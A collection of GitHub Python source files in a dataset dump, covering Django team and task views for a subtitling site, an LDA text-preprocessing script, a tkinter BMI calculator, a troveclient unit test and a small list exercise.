team.members.filter(role=TeamMember.ROLE_OWNER).exclude(pk=member.pk).exists()\n )\n if is_last_owner:\n return u'You are the last owner of this team.'\n\n is_last_admin = (\n member.role == TeamMember.ROLE_ADMIN\n and not team.members.filter(role=TeamMember.ROLE_ADMIN).exclude(pk=member.pk).exists()\n and not team.members.filter(role=TeamMember.ROLE_OWNER).exists()\n )\n if is_last_admin:\n return u'You are the last admin of this team.'\n\n return None\n\n@login_required\ndef leave_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n error = _check_can_leave(team, user)\n if error:\n messages.error(request, _(error))\n else:\n member = TeamMember.objects.get(team=team, user=user)\n tm_user_pk = member.user.pk\n team_pk = member.team.pk\n member.delete()\n notifier.team_member_leave(team_pk, tm_user_pk)\n\n messages.success(request, _(u'You have left this team.'))\n\n return redirect(request.META.get('HTTP_REFERER') or team)\n\n@permission_required('teams.change_team')\ndef highlight(request, slug, highlight=True):\n item = get_object_or_404(Team, slug=slug)\n item.highlight = highlight\n item.save()\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\ndef _member_search_result(member, team, task_id, team_video_id, task_type, task_lang):\n result = [member.user.id, u'%s (%s)' % (member.user, member.user.username)]\n\n if task_id:\n task = Task.objects.not_deleted().get(team=team, pk=task_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task(member.user, task)]\n elif team_video_id:\n team_video = TeamVideo.objects.get(pk=team_video_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task_for(member.user, task_type, team_video, task_lang)]\n else:\n result += [None]\n\n return result\n\n@render_to_json\ndef search_members(request, slug):\n team = Team.get(slug, request.user)\n q = request.GET.get('term', '').replace('(', '').replace(')', '')\n terms = get_terms(q)\n\n task_id = request.GET.get('task')\n task_type = request.GET.get('task_type')\n task_lang = request.GET.get('task_lang')\n team_video_id = request.GET.get('team_video')\n\n members = team.members.filter(user__is_active=True)\n for term in terms:\n members = members.filter(\n Q(user__username__icontains=term) |\n Q(user__first_name__icontains=term) |\n Q(user__last_name__icontains=term)\n )\n members = members.select_related('user')[:MAX_MEMBER_SEARCH_RESULTS]\n\n results = [_member_search_result(m, team, task_id, team_video_id, task_type, task_lang)\n for m in members]\n\n return { 'results': results }\n\n\n# Tasks\ndef _get_or_create_workflow(team_slug, project_id, team_video_id):\n try:\n workflow = Workflow.objects.get(team__slug=team_slug, project=project_id,\n team_video=team_video_id)\n except Workflow.DoesNotExist:\n # We special case this because Django won't let us create new models\n # with the IDs, we need to actually pass in the Model objects for\n # the ForeignKey fields.\n #\n # Most of the time we won't need to do these three extra queries.\n\n team = Team.objects.get(slug=team_slug)\n project = Project.objects.get(pk=project_id) if project_id else None\n team_video = TeamVideo.objects.get(pk=team_video_id) if team_video_id else None\n\n workflow = Workflow(team=team, project=project, team_video=team_video)\n\n return workflow\n\ndef _task_languages(team, user):\n languages = filter(None, Task.objects.filter(team=team, deleted=False)\n .values_list('language', flat=True)\n .distinct())\n\n language_labels = dict(get_language_choices(with_empty=True))\n\n # TODO: Handle the team language setting here once team settings are\n # implemented.\n languages = list(set(languages))\n lang_data = []\n for l in languages:\n if language_labels.get(l):\n lang_data.append({'code': l, 'name': language_labels[l]} )\n else:\n logger.error(\"Failed to find language code for task\", extra={\n \"data\": {\n \"language_code\": l,\n \"supported\": language_labels\n }\n })\n return lang_data\n\ndef _task_category_counts(team, filters, user):\n tasks = team.task_set.incomplete()\n\n if filters['language']:\n tasks = tasks.filter(language=filters['language'])\n\n if filters['team_video']:\n tasks = tasks.filter(team_video=int(filters['team_video']))\n\n if filters['assignee']:\n if filters['assignee'] == 'none':\n tasks = tasks.filter(assignee=None)\n else:\n tasks = tasks.filter(assignee=user)\n\n counts = { 'all': tasks.count() }\n\n for type in ['Subtitle', 'Translate', 'Review', 'Approve']:\n counts[type.lower()] = tasks.filter(type=Task.TYPE_IDS[type]).count()\n\n return counts\n\ndef _tasks_list(request, team, project, filters, user):\n '''List tasks for the given team, optionally filtered.\n\n `filters` should be an object/dict with zero or more of the following keys:\n\n * type: a string describing the type of task. 'Subtitle', 'Translate', etc.\n * completed: true or false\n * assignee: user ID as an integer\n * team_video: team video ID as an integer\n\n '''\n tasks = Task.objects.filter(team=team.id, deleted=False)\n\n if project:\n tasks = tasks.filter(team_video__project = project)\n\n if filters.get('team_video'):\n tasks = tasks.filter(team_video=filters['team_video'])\n\n if filters.get('completed'):\n tasks = tasks.filter(completed__isnull=False)\n else:\n tasks = tasks.filter(completed=None)\n\n if filters.get('language'):\n if filters.get('language') == 'mine' and request.user.is_authenticated():\n tasks = tasks.filter(language__in=[ul.language for ul in request.user.get_languages()])\n else:\n tasks = tasks.filter(language=filters['language'])\n\n if filters.get('q'):\n terms = get_terms(filters['q'])\n for term in terms:\n tasks = tasks.filter(\n Q(team_video__video__title__icontains=term)\n | Q(team_video__title__icontains=term)\n )\n\n if filters.get('type'):\n tasks = tasks.filter(type=Task.TYPE_IDS[filters['type']])\n\n if filters.get('assignee'):\n assignee = filters.get('assignee')\n\n if assignee == 'me':\n tasks = tasks.filter(assignee=user)\n elif assignee == 'none':\n tasks = tasks.filter(assignee=None)\n elif assignee and assignee.isdigit():\n tasks = tasks.filter(assignee=int(assignee))\n elif assignee:\n tasks = tasks.filter(assignee=User.objects.get(username=assignee))\n\n return tasks.select_related('team_video__video', 'team_video__team', 'assignee', 'team', 'team_video__project')\n\ndef _order_tasks(request, tasks):\n sort = request.GET.get('sort', '-created')\n\n if sort == 'created':\n tasks = tasks.order_by('created')\n elif sort == '-created':\n tasks = tasks.order_by('-created')\n elif sort == 'expires':\n tasks = tasks.exclude(expiration_date=None).order_by('expiration_date')\n elif sort == '-expires':\n tasks = tasks.exclude(expiration_date=None).order_by('-expiration_date')\n\n return tasks\n\ndef _get_task_filters(request):\n return { 'language': request.GET.get('lang'),\n 'type': request.GET.get('type'),\n 'team_video': request.GET.get('team_video'),\n 'assignee': request.GET.get('assignee'),\n 'q': request.GET.get('q'), }\n\n@render_to('teams/tasks.html')\ndef team_tasks(request, slug, project_slug=None):\n team = Team.get(slug, request.user)\n\n if not can_view_tasks_tab(team, request.user):\n messages.error(request, _(\"You cannot view this team's tasks.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n # TODO: Review this\n if project_slug is not None:\n project = get_object_or_404(Project, team=team, slug=project_slug)\n else:\n project = None\n\n user = request.user if request.user.is_authenticated() else None\n member = team.members.get(user=user) if user else None\n languages = _task_languages(team, request.user)\n languages = sorted(languages, key=lambda l: l['name'])\n filters = _get_task_filters(request)\n filtered = 0\n\n tasks = _order_tasks(request,\n _tasks_list(request, team, project, filters, user))\n category_counts = _task_category_counts(team, filters, request.user)\n tasks, pagination_info = paginate(tasks, TASKS_ON_PAGE, request.GET.get('page'))\n\n if filters.get('team_video'):\n filters['team_video'] = TeamVideo.objects.get(pk=filters['team_video'])\n\n if filters.get('assignee'):\n if filters['assignee'] == 'me':\n filters['assignee'] = team.members.get(user=request.user)\n elif filters['assignee'] == 'none':\n filters['assignee'] == None\n elif filters['assignee'].isdigit():\n filters['assignee'] = team.members.get(user=filters['assignee'])\n else:\n filters['assignee'] = team.members.get(user=User.objects.get(username=filters['assignee']))\n\n filtered = filtered + 1\n\n if filters.get('language'):\n filtered = filtered + 1\n\n if filters.get('type'):\n filtered = filtered + 1\n\n widget_settings = {}\n from apps.widget.rpc import add_general_settings\n add_general_settings(request, widget_settings)\n\n video_pks = [t.team_video.video_id for t in tasks]\n video_urls = dict([(vu.video_id, vu.effective_url) for vu in\n VideoUrl.objects.filter(video__in=video_pks, primary=True)])\n\n for t in tasks:\n t.cached_video_url = video_urls.get(t.team_video.video_id)\n\n context = {\n 'team': team,\n 'project': project, # TODO: Review\n 'user_can_delete_tasks': can_delete_tasks(team, request.user),\n 'user_can_assign_tasks': can_assign_tasks(team, request.user),\n 'assign_form': TaskAssignForm(team, member),\n 'languages': languages,\n 'category_counts': category_counts,\n 'tasks': tasks,\n 'filters': filters,\n 'widget_settings': widget_settings,\n 'filtered': filtered,\n 'member': member,\n 'upload_draft_form': UploadDraftForm()\n }\n\n context.update(pagination_info)\n\n return context\n\n@render_to('teams/create_task.html')\ndef create_task(request, slug, team_video_pk):\n team = get_object_or_404(Team, slug=slug)\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk, team=team)\n can_assign = can_assign_tasks(team, request.user, team_video.project)\n\n if request.POST:\n form = TaskCreateForm(request.user, team, team_video, request.POST)\n\n if form.is_valid():\n task = form.save(commit=False)\n\n task.team = team\n task.team_video = team_video\n\n task.set_expiration()\n\n if task.type == Task.TYPE_IDS['Subtitle']:\n task.language = ''\n\n if task.type in [Task.TYPE_IDS['Review'], Task.TYPE_IDS['Approve']]:\n task.approved = Task.APPROVED_IDS['In Progress']\n task.subtitle_version = task.team_video.video.latest_version(language_code=task.language)\n\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n return HttpResponseRedirect(reverse('teams:team_tasks', args=[],\n kwargs={'slug': team.slug}))\n else:\n form = TaskCreateForm(request.user, team, team_video)\n\n subtitlable = json.dumps(can_create_task_subtitle(team_video, request.user))\n translatable_languages = json.dumps(can_create_task_translate(team_video, request.user))\n\n language_choices = json.dumps(get_language_choices(True))\n\n return { 'form': form, 'team': team, 'team_video': team_video,\n 'translatable_languages': translatable_languages,\n 'language_choices': language_choices,\n 'subtitlable': subtitlable,\n 'can_assign': can_assign, }\n\n@login_required\ndef perform_task(request, slug=None, task_pk=None):\n task_pk = task_pk or request.POST.get('task_id')\n task = Task.objects.get(pk=task_pk)\n if slug:\n team = get_object_or_404(Team,slug=slug)\n if task.team != team:\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n if not can_perform_task(request.user, task):\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n task.assignee = request.user\n task.save()\n\n # ... perform task ...\n return HttpResponseRedirect(task.get_perform_url())\n\ndef _delete_subtitle_version(version):\n sl = version.language\n n = version.version_no\n\n # Delete this specific version...\n version.delete()\n\n # We also want to delete all draft subs leading up to this version.\n for v in sl.subtitleversion_set.filter(version_no__lt=n).order_by('-version_no'):\n if v.is_public:\n break\n v.delete()\n\n # And if we've deleted everything in the language, we can delete the language as well.\n if not sl.subtitleversion_set.exists():\n sl.delete()\n\ndef delete_task(request, slug):\n '''Mark a task as deleted.\n\n The task will not be physically deleted from the database, but will be\n flagged and won't appear in further task listings.\n\n '''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskDeleteForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n video = task.team_video.video\n task.deleted = True\n\n if task.subtitle_version:\n if form.cleaned_data['discard_subs']:\n _delete_subtitle_version(task.subtitle_version)\n task.subtitle_version = None\n\n if task.get_type_display() in ['Review', 'Approve']:\n # TODO: Handle subtitle/translate tasks here too?\n if not form.cleaned_data['discard_subs'] and task.subtitle_version:\n task.subtitle_version.moderation_status = MODERATION.APPROVED\n task.subtitle_version.save()\n metadata_manager.update_metadata(video.pk)\n\n task.save()\n\n messages.success(request, _('Task deleted.'))\n else:\n messages.error(request, _('You cannot delete this task.'))\n\n return HttpResponseRedirect(next)\n\ndef assign_task(request, slug):\n '''Assign a task to the given user, or unassign it if null/None.'''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskAssignForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n assignee = form.cleaned_data['assignee']\n\n if task.assignee == request.user:\n was_mine = True\n else:\n was_mine = False\n\n task.assignee = assignee\n task.set_expiration()\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n\n if task.assignee is None and was_mine:\n messages.success(request, _('Task declined.'))\n else:\n messages.success(request, _('Task assigned.'))\n else:\n messages.error(request, _('You cannot assign this task.'))\n\n return HttpResponseRedirect(next)\n\n@render_to_json\n@login_required\ndef assign_task_ajax(request, slug):\n '''Assign a task to the given user, or unassign it if null/None.'''\n team = get_object_or_404(Team, slug=slug)\n\n form = TaskAssignForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n assignee = form.cleaned_data['assignee']\n\n task.assignee = assignee\n task.set_expiration()\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n\n return { 'success': True }\n else:\n return HttpResponseForbidden(_(u'Invalid assignment attempt.'))\n\ndef upload_draft(request, slug):\n\n if request.POST:\n form = UploadDraftForm(request.POST)\n\n if form.is_valid():\n\n team = get_object_or_404(Team, slug=slug)\n task = form.cleaned_data['task']\n draft = form.cleaned_data['draft']\n\n # Parse the file, etc.\n\n messages.success(request, _(u\"Draft uploaded successfully.\"))\n else:\n messages.error(request, _(u\"There was a problem uploading that draft.\"))\n\n return HttpResponseRedirect(reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n else:\n return HttpResponseBadRequest()\n\n# Projects\ndef project_list(request, slug):\n team = get_object_or_404(Team, slug=slug)\n projects = Project.objects.for_team(team)\n return render_to_response(\"teams/project_list.html\", {\n \"team\":team,\n \"projects\": projects\n }, RequestContext(request))\n\n@render_to('teams/settings-projects-add.html')\n@login_required\ndef add_project(request, slug):\n team = Team.get(slug, request.user)\n\n if request.POST:\n form = ProjectForm(request.POST)\n workflow_form = WorkflowForm(request.POST)\n\n if form.is_valid() and workflow_form.is_valid():\n\n if team.project_set.filter(slug=pan_slugify(form.cleaned_data['name'])).exists():\n messages.error(request, _(u\"There's already a project with this name\"))\n else:\n project = form.save(commit=False)\n project.team = team\n project.save()\n\n if project.workflow_enabled:\n workflow = workflow_form.save(commit=False)\n workflow.team = team\n workflow.project = project\n workflow.save()\n\n messages.success(request, _(u'Project added.'))\n return HttpResponseRedirect(\n reverse('teams:settings_projects', args=[], kwargs={'slug': slug}))\n else:\n form = ProjectForm()\n workflow_form = WorkflowForm()\n\n return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects-edit.html')\n@login_required\ndef edit_project(request, slug, project_slug):\n team = Team.get(slug, request.user)\n project = Project.objects.get(slug=project_slug, team=team)\n project_list_url = reverse('teams:settings_projects', args=[], kwargs={'slug': slug})\n\n if project.is_default_project:\n messages.error(request, _(u'You cannot edit that project.'))\n return HttpResponseRedirect(project_list_url)\n\n try:\n workflow = Workflow.objects.get(team=team, project=project)\n except Workflow.DoesNotExist:\n workflow = None\n\n if request.POST:\n if request.POST.get('delete', None) == 'Delete':\n project.delete()\n messages.success(request, _(u'Project deleted.'))\n return HttpResponseRedirect(project_list_url)\n else:\n form = ProjectForm(request.POST, instance=project)\n workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n # if the project doesn't have workflow enabled, the workflow form\n # is going to fail to validate (workflow is None)\n # there's probably a better way of doing this...\n if form.is_valid() and workflow_form.is_valid if project.workflow_enabled else form.is_valid():\n form.save()\n\n if project.workflow_enabled:\n workflow = workflow_form.save(commit=False)\n workflow.team = team\n workflow.project = project\n workflow.save()\n\n messages.success(request, _(u'Project saved.'))\n return HttpResponseRedirect(project_list_url)\n\n else:\n form = ProjectForm(instance=project)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'project': project, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/_third-party-accounts.html')\n@login_required\ndef third_party_accounts(request, slug):\n from accountlinker.views import _generate_youtube_oauth_request_link\n team = get_object_or_404(Team, slug=slug)\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n new_youtube_url = _generate_youtube_oauth_request_link(str(team.pk))\n linked_accounts = team.third_party_accounts.all()\n return {\n \"team\":team,\n \"new_youtube_url\": new_youtube_url,\n \"linked_accounts\": linked_accounts,\n }\n\n\n# Unpublishing\ndef _create_task_after_unpublishing(subtitle_version):\n team_video = subtitle_version.language.video.get_team_video()\n lang = subtitle_version.language.language\n\n # If there's already an open task for this language we don't need another.\n open_task_exists = team_video.task_set.incomplete().filter(language=lang).exists()\n\n if open_task_exists:\n return None\n\n workflow = Workflow.get_for_team_video(team_video)\n if workflow.approve_allowed:\n type = Task.TYPE_IDS['Approve']\n can_do = can_approve\n else:\n type = Task.TYPE_IDS['Review']\n can_do = can_review\n\n # Try to guess the appropriate assignee by looking at the last task.\n last_task = (team_video.task_set.complete().filter(language=lang, type=type)\n .order_by('-completed')\n [:1])\n assignee = None\n if last_task:\n candidate = last_task[0].assignee\n if candidate and can_do(team_video, candidate, lang):\n assignee = candidate\n\n task = Task(team=team_video.team, team_video=team_video,\n assignee=assignee, language=lang, type=type,\n subtitle_version=subtitle_version)\n task.set_expiration()\n task.save()\n\n return task\n\ndef _propagate_unpublish_to_external_services(language_pk, language_code, video):\n \"\"\"Push the 'unpublishing' of subs to third-party providers for the given language.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = SubtitleLanguage.objects.get(pk=language_pk)\n except SubtitleLanguage.DoesNotExist:\n delete_captions_in_original_service_by_code.delay(language_code, video.pk)\n return\n\n # Find the latest public version to determine what kind of third-party call\n # we need to make.\n latest_version = language.latest_version(public_only=True)\n\n if latest_version:\n # There's a latest version that's still public, so third-party services\n # should use that one.\n upload_subtitles_to_original_service.delay(latest_version.pk)\n else:\n # There's no latest version that's still public, but we know the\n # language still exists.\n #\n # This means that all of the subs in the language have been unpublished\n # and are awaiting moderation.\n #\n # In this case we should delete the subs from the external service\n # entirely, since we know that all the subs we have are bad.\n delete_captions_in_original_service.delay(language_pk)\n\ndef _propagate_unpublish_to_tasks(team_video, language_pk, language_code):\n \"\"\"Push the 'unpublishing' of a language to any tasks applying to it.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = SubtitleLanguage.objects.get(pk=language_pk)\n if language and language.latest_version(public_only=False):\n # Don't kill any tasks if there are still versions remaining.\n return\n except SubtitleLanguage.DoesNotExist:\n pass\n\n tasks_to_delete = team_video.task_set.not_deleted()\n\n # If there is still no original language left, we can just delete all the\n # tasks for this video because someone deleted everything.\n #\n # If there *is* an original language left, we just delete tasks for the\n # languages that were unpublished.\n if team_video.video.subtitle_language():\n tasks_to_delete = tasks_to_delete.filter(language=language_code)\n\n tasks_to_delete.update(deleted=True)\n\ndef unpublish(request, slug):\n team = get_object_or_404(Team, slug=slug)\n\n form = UnpublishForm(request.user, team, request.POST)\n if not form.is_valid():\n messages.error(request, _(u'Invalid unpublishing request.\\nErrors:\\n') + '\\n'.join(flatten_errorlists(form.errors)))\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n version = form.cleaned_data['subtitle_version']\n team_video = version.language.video.get_team_video()\n video = version.language.video\n scope = form.cleaned_data['scope']\n should_delete = form.cleaned_data['should_delete']\n language = version.language\n\n results = []\n if scope == 'version':\n results.append([version.language.pk, version.language.language,\n version.unpublish(delete=should_delete)])\n elif scope == 'dependents':\n translations = list(SubtitleLanguage.objects.filter(video=language.video,\n standard_language=language,\n is_forked=False))\n for l in [language] + translations:\n results.append([l.pk, l.language,\n l.unpublish(delete=should_delete)])\n else:\n assert False, 'Invalid scope.'\n\n for language_pk, language_code, version_for_task in results:\n _propagate_unpublish_to_external_services(language_pk, language_code, video)\n _propagate_unpublish_to_tasks(team_video, language_pk, language_code)\n\n if version_for_task:\n _create_task_after_unpublishing(version_for_task)\n\n metadata_manager.update_metadata(team_video.video.pk)\n update_one_team_video(team_video.pk)\n\n messages.success(request, _(u'Successfully unpublished subtitles.'))\n api_subtitles_rejected.send(version)\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n@login_required\ndef auto_captions_status(request, slug):\n \"\"\"\n Prints a simple table of partner status for captions, this should\n should be used internally (as a cvs file with tab delimiters)\n \"\"\"\n buffer = []\n team = get_object_or_404(Team, slug=slug)\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n buffer.append( \"Video\\tproject\\tURL\\tstatus\\tjob_id\\ttask_id\\tcreated on\\tcompleted on\")\n for tv in team.teamvideo_set.all().select_related(\"job\", \"project\", \"video\"):\n jobs = tv.job_set.all()\n extra = \"\"\n if jobs.exists():\n j = jobs[0]\n extra = \"%s\\t%s\\t%s\\t%s\\t%s\" % (j.status, j.job_id, j.task_id, j.created_on, j.completed_on)\n url = \"%s://%s%s\" % (DEFAULT_PROTOCOL, Site.objects.get_current().domain, tv.video.get_absolute_url())\n buffer.append( \"Video:%s\\t %s\\t%s\\t %s\" % (tv.video.title,tv.project.name, url, extra))\n response = HttpResponse( \"\\n\".join(buffer), content_type=\"text/csv\")\n response['Content-Disposition'] = 'filename=team-status.csv'\n return response\n","repo_name":"nemgue/unisubs","sub_path":"apps/teams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":59698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"73319974511","text":"from gensim.corpora import Dictionary, MmCorpus\nfrom konlpy.tag import Okt\nfrom gensim import word2vec\nfrom gensim.models import Phrases\nimport csv\n\ntwitter = Okt()\nresults = []\n\ndata_path = 'posts_data_50.csv'\nparsed_path = 'parsed_bamboo.txt'\nword2vec_path = 'Bambooword2vec.model'\n\n\n# parsing the data to parsed_bamboo.txt\ndef clean_posts(post):\n lines = post[0].split(\"\\n\")\n for line in lines:\n temp_list = twitter.pos(line, norm=True, stem=True)\n r = []\n for word in temp_list:\n if not word[1] in [\"Josa\", \"Eomi\", \"Punctuation\"]:\n r.append(word[0])\n rl = (\" \".join(r)).strip()\n return rl\n\n\nwith open(data_path, 'w') as f:\n data = csv.reader(f, delimiter=',')\n for row in data:\n results.append(clean_posts(row))\n\n\nwith open(parsed_path, 'w', encoding='utf-8') as fp:\n fp.write(\"\\n\".join(results))\n\n# making of the lda phrases analysis\n\n# making of the dictionary for lda topic analysis\ndict_made = False\n\ndict_path = 'dictionary.dict'\n\nif dict_made:\n dictionary = Dictionary.load(dict_path)\nelse:\n reviews_for_lda = word2vec.LineSentence(reviews_for_lda_filepath)\n dictionary = Dictionary(reviews_for_lda)\n dictionary.filter_extremes(no_below=10, no_above=0.4)\n dictionary.compactify()\n\n dictionary.save(dict_path)","repo_name":"haesookim/fbpage-scraping-exercise","sub_path":"lda_alt.py","file_name":"lda_alt.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34877042495","text":"# importing the tkinter module\nfrom tkinter import *\n\n# creating root window\nroot = Tk()\nroot.title(\"Ideal Body Mass Index\")\nroot.geometry(\"900x700\")\nroot.config(bg=\"cyan\")\nheader = Label(root, text='Ideal Body Mass Index Calculator', bg='gold', fg='blue', font=30)\nheader.place(x=250, y=20)\n\n# creating a frame in a root\nframe = Frame(root, width=500, height=200, relief='raised', bg='goldenrod')\nframe.place(x=200, y=50)\n\n# creating labels in a frame\nbmi_weight = Label(frame, text=\"Weight(kg):\", bg='white', fg='green')\nbmi_weight.place(x=50, y=20)\nbmi_weight_entry = Entry(frame)\nbmi_weight_entry.place(x=200, y=20)\n\nbmi_height = Label(frame, text=\"Height(cm):\", bg='white', fg='green')\nbmi_height.place(x=45, y=60)\nbmi_height_entry = Entry(frame)\nbmi_height_entry.place(relx=0.4, rely=0.3)\n\nuser_gender = Label(frame, text=\"Gender:\", bg='white', fg='green')\nuser_gender.place(rely=0.53, relx=0.1)\n\nage = Label(frame, text=\"Age:\", bg='white', fg='green')\nage.place(rely=0.8, relx=0.1)\nage_entry = Entry(frame, state='readonly')\nage_entry.place(rely=0.8, relx=0.4)\n\noptions = ['Female...', 'Male']\nvariable = StringVar(frame)\nvariable.set(options[0])\n\n# Below is the functions created\ndef activate(value):\n variable.set(value)\n if value != \"Select...\":\n age_entry.config(state='normal')\n else:\n age_entry.config(state='readonly')\n\n\ngender_menu = OptionMenu(frame, variable, *options, command=activate)\ngender_menu.place(relx=0.4, rely=0.5)\n\n\ndef bmi_calc():\n try:\n float(bmi_weight_entry.get())\n float(bmi_height_entry.get())\n float(age_entry.get())\n if variable.get() == \"Female..\":\n raise ValueError\n elif variable.get() == \"Male\":\n result = ((0.5 * float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + 11.5\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n elif variable.get() == \"Female\":\n result = ((0.5 * float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + (\n 0.03 * float(age_entry.get())) + 11\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n if result_bmi < 18.5:\n category.config(text='Underweight')\n elif 18.5 <= result_bmi < 25:\n category.config(text='Healthy')\n elif 25 <= result_bmi < 30:\n category.config(text='Overweight')\n elif result_bmi >= 30:\n category.config(text='Obese')\n\n except ValueError:\n messagebox.showerror(title=None, message='Gender was not specified or invalid entry was given')\n delete()\n\n\ncalculate = Button(root, text=\"Calculate your Ideal Body Mass Index\", width=50, command=bmi_calc)\ncalculate.place(rely=0.45, relx=0.2)\n\nbmi = Label(root, text=\"BMI:\", bg='white', fg=\"green\")\nbmi.place(rely=0.55, relx=0.1)\nbmi_field = Entry(root, state='readonly')\nbmi_field.place(rely=0.55, relx=0.2)\nideal_bmi = Label(root, text='Ideal BMI:', bg='white', fg=\"green\")\nideal_bmi.place(rely=0.55, relx=0.5)\nideal_field = Entry(root, state='readonly')\nideal_field.place(rely=0.55, relx=0.65)\n\n# The delete button function\ndef delete():\n bmi_weight_entry.delete(0, END)\n bmi_height_entry.delete(0, END)\n age_entry.config(state='normal')\n bmi_field.config(state='normal')\n ideal_field.config(state='normal')\n age_entry.delete(0, END)\n bmi_field.delete(0, END)\n ideal_field.delete(0, END)\n age_entry.config(state='readonly')\n bmi_field.config(state='readonly')\n ideal_field.config(state='readonly')\n bmi_weight_entry.focus()\n variable.set(options[0])\n category.config(text='')\n\n\ncategory_head = Label(root, text=\"Category:\", bg='orange', fg='white')\ncategory = Label(root, width=20, bg='blue', fg='white')\ncategory.place(relx=0.38, rely=0.72)\ncategory_head.place(relx=0.45, rely=0.67)\nclear = Button(root, text='Clear', command=delete)\nclear.place(rely=0.85, relx=0.1)\nquit = Button(root, text='Exit', command='exit')\nquit.place(rely=0.85, relx=0.83)\n\n\nroot.mainloop()\n","repo_name":"mndabeni06/BMI_CALCULATOR","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72611774831","text":"import testtools\nfrom unittest import mock\n\nfrom troveclient.v1 import root\n\n\"\"\"\nUnit tests for root.py\n\"\"\"\n\n\nclass RootTest(testtools.TestCase):\n def setUp(self):\n super(RootTest, self).setUp()\n self.orig__init = root.Root.__init__\n root.Root.__init__ = mock.Mock(return_value=None)\n self.root = root.Root()\n self.root.api = mock.Mock()\n self.root.api.client = mock.Mock()\n\n def tearDown(self):\n super(RootTest, self).tearDown()\n root.Root.__init__ = self.orig__init\n\n def _get_mock_method(self):\n self._resp = mock.Mock()\n self._body = None\n self._url = None\n\n def side_effect_func(url, body=None):\n self._body = body\n self._url = url\n return (self._resp, body)\n\n return mock.Mock(side_effect=side_effect_func)\n\n def test_delete(self):\n self.root.api.client.delete = self._get_mock_method()\n self._resp.status_code = 200\n self.root.delete(1234)\n self.assertEqual('/instances/1234/root', self._url)\n self._resp.status_code = 400\n self.assertRaises(Exception, self.root.delete, 1234)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"}
+{"seq_id":"17949364832","text":"#_main_\r\nli=[]\r\nwhile(True):\r\n item = eval(input(\"\\nEnter any correct format item to insert = \"))\r\n ind = int(input(\"Enter the index for insertion = \"))\r\n if(ind>len(li) or ind<0):\r\n print(\"Array index is out of range. Try Again !\")\r\n continue\r\n else:\r\n li.insert(ind, item)\r\n print(\"Now your array = \", li)\r\n \r\n choice = int(input(\"Want to continue? (1/0) = \"))\r\n if(choice==0):\r\n print(\"---> Come again later <---\")\r\n break\r\n continue","repo_name":"RitamPaul/Python_Scripting_College","sub_path":"insertItems_List.py","file_name":"insertItems_List.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
